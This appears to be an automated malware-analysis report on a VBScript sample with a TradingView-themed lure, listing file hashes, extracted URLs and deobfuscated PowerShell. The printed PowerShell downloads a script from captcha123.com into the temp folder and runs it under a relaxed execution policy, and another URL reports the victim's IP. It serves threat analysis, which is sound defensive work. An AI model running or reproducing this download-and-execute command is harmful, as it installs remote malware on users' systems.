|
Hash | Hash Value |
|---|---|
| MD5 | e7fc1f913b8f9ca6c1ec09a8b09f5317
|
| Sha1 | cd1be7c6d1b90ac9dd65d68c74848c196e153db9
|
| Sha256 | 52c8dbdbb49a1df98c8b79b8e268e8e7c8c9c05aee6bf3fc5aecc0093e8627b0
|
| Sha384 | a07e6f0aae74983ed6fc4a55615b8a3db9bff45c90a2ec680e2937fdf346d083381021019f1b13d25c4b9820daf737d6
|
| Sha512 | 7e1cdf2581d7c37dc0ea58c01d0d8d8165977368e0ed8190fc515942bd45759cfc8c490e57595cc6663f028ea33f6f42462a2ad3fc4fa5af947d814f59ffd666
|
| SSDeep | 12:SQvDzYHYNWQTuGHHppLsd8XIP4lFPbGVvGHDh8O8XIYAHpwo8b:SQA4buGHJB24lFTXHDCfJb
|
| TLSH | 6AF02697C62DD1171797809C217514F8CD47E24DF0096825C590740F6C350F0EF80786
|
|
Name0 | Value |
|---|---|
| URLs in VB Code - #1 | https://api.ipify.org |
| URLs in VB Code - #2 | https://dfgdfgeiurguer.live/lander/tradingview/counter.php?ip= |
| URLs in VB Code - #3 | https://captcha123.com/lander/tradingview/1.ps1 |
| Deobfuscated PowerShell | $url = "https://captcha123.com/lander/tradingview/1.ps1" $output = Join-Path $env:TEMP "script.ps1" Invoke-WebRequest -Uri $url -OutFile $output powershell -NoProfile -ExecutionPolicy "RemoteSigned" -File $output |
| Deobfuscated PowerShell | "" $url = "https://captcha123.com/lander/tradingview/1.ps1" $output = Join-Path $env:TEMP "script.ps1" Invoke-WebRequest -Uri $url -OutFile $output powershell -NoProfile -ExecutionPolicy "RemoteSigned" -File $output", 0, False |
| Deobfuscated PowerShell | [Unmanaged(ErrorExpressionAst)] "RemoteSigned" -File $output |
| Deobfuscated PowerShell | [Unmanaged(ErrorExpressionAst)] "RemoteSigned" -File $output ", 0, False" |
| Deobfuscated PowerShell | @(0, [Unmanaged(ErrorExpressionAst)] ,) false |
|
Name0 | Value | Location |
|---|---|---|
| URLs in VB Code - #1 | https://api.ipify.org |
e7fc1f913b8f9ca6c1ec09a8b09f5317 |
| URLs in VB Code - #2 | https://dfgdfgeiurguer.live/lander/tradingview/counter.php?ip= |
e7fc1f913b8f9ca6c1ec09a8b09f5317 |
| URLs in VB Code - #3 | https://captcha123.com/lander/tradingview/1.ps1 |
e7fc1f913b8f9ca6c1ec09a8b09f5317 |
| Deobfuscated PowerShell | $url = "https://captcha123.com/lander/tradingview/1.ps1" $output = Join-Path $env:TEMP "script.ps1" Invoke-WebRequest -Uri $url -OutFile $output powershell -NoProfile -ExecutionPolicy "RemoteSigned" -File $output Malicious |
e7fc1f913b8f9ca6c1ec09a8b09f5317 > e7fc1f913b8f9ca6c1ec09a8b09f5317.deobfuscated.vbs > [Command #0] > [PowerShell Command] |
| Deobfuscated PowerShell | "" $url = "https://captcha123.com/lander/tradingview/1.ps1" $output = Join-Path $env:TEMP "script.ps1" Invoke-WebRequest -Uri $url -OutFile $output powershell -NoProfile -ExecutionPolicy "RemoteSigned" -File $output", 0, False Malicious |
e7fc1f913b8f9ca6c1ec09a8b09f5317 > [PowerShell Command] |
| Deobfuscated PowerShell | [Unmanaged(ErrorExpressionAst)] "RemoteSigned" -File $output Malicious |
e7fc1f913b8f9ca6c1ec09a8b09f5317 > e7fc1f913b8f9ca6c1ec09a8b09f5317.deobfuscated.vbs > [Command #0] > [PowerShell Command] > [Deobfuscated PS] > [PowerShell Command] |
| Deobfuscated PowerShell | [Unmanaged(ErrorExpressionAst)] "RemoteSigned" -File $output ", 0, False" Malicious |
e7fc1f913b8f9ca6c1ec09a8b09f5317 > [PowerShell Command] > [Deobfuscated PS] > [PowerShell Command] |
| Deobfuscated PowerShell | @(0, [Unmanaged(ErrorExpressionAst)] ,) false Malicious |
e7fc1f913b8f9ca6c1ec09a8b09f5317 > [PowerShell Command] > [PowerShell Command] |